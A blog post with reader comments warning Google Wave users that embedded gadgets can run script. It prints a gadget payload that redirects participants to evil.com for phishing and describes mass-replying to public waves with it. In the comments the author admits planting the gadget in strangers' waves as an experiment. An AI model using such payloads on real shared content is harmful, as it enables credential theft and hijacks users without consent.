Dear google wave user, do not trust all wave even if it comes from your co-worker. You know a wave can have various elements including text, image, attachment etc. The most strongest thing is, one can embedd a gadget inside a wave. Wave gadgets are not full boasted applications, but small add-ons that can improve a conversation. For example, a wave might include a gadget that lets wave participants vote on where to go to lunch.
Let’s look at a simple hello world gadget:
<?xmlversion="1.0" encoding="UTF-8"?> <Module> <ModulePrefs title="hello world example" /> <Content type="html"><![CDATA[ Hello, world! ]]></Content> </Module>
If you save this content in a xml file and host it in a server and then while creating/replying a wave, add the URL of this xml file, the participants of the wave will see a message “Hello, world!” when they open that wave. This is the way, gadget works in google wave. Now if we modify the above gadget in the following way, what will happen?
<?xml version="1.0" encoding="UTF-8"?> <Module> <ModulePrefs title="hello world example" /> <Content type="html"><![CDATA[ <script type="text/javascript"> top.location = "http://www.evil.com" </script> ]]></Content> </Module>
Yes, the participants of the wave that included this gadget will be immediately redirected to the evil’s site. Phishing attack with google wave is possible in this way. And that is the dangerous issue I am talking about. Hackers can redirect you in such a page which is similar to google wave login page. You will think that for some reason you are logged out. You will put the username and password to login again instead of thinking why did I logged out. Just after submitting the credential, the hacker will get your username and password because you have submitted your credential in a hacker’s page not in the google wave’s actual login page.
This can be happen, usually maximum number of users don’t look at the browser’s address bar always. Whenever they will be asked to put credential, they will put that because the phished page will be very similar to the real login page of google wave. So, always look at the address bar specially when any credential is asked. Just make sure you are putting right information in right place.
The similar attack can be used for different purpose. One can use this redirection technique to increase traffic to his site as well. You know, a wave can be public and there is a way to search all public waves. That is search by with:public You can add some keywords as well like with:public first time. This way a user can search hundreds of thousands of public wave and then can reply all of them with the malicious gadget. Every people will visit that wave will be redirected to the user’s site and he will get a lot of traffic until Google catch him.
I appreciate the information, but surely it’s better to create a wave that does this rather than altering existing waves.
Jotil finding….
@James: I understand what did you mean, actually I was experimenting something by replying some public waves. And you are the proof that it works. Thanks for your comment.
so why have google made it so that the wave screen can be taken over, is there no way to prevent it?
There also needs to be some way to make waves private while allowing new people to join in some way and it cant be by adding hundreds of people to a wave as it would take too long.
btw I am still using that wave you directed me from so could you kindly give it back?
@Alex: Sorry for the inconvenience, I am trying to find out the waves to remove the gadget.
Thanks to give alert to be careful and I should be. This is really horrible matter if someone taking someone’s credential. Do you have any more suggestion to prevent such suspicious act? Did you post your find to google wave doctor?
@Obaidul: Yes, Google is already aware of this issue but interestingly they don’t think this is a security problem right now. But one day they will be wake up when some bad people will start to use this hole to generate traffic or phishing. Right now, just don’t trust all waves.
Dear monir bhaia, another cool article about the security issue.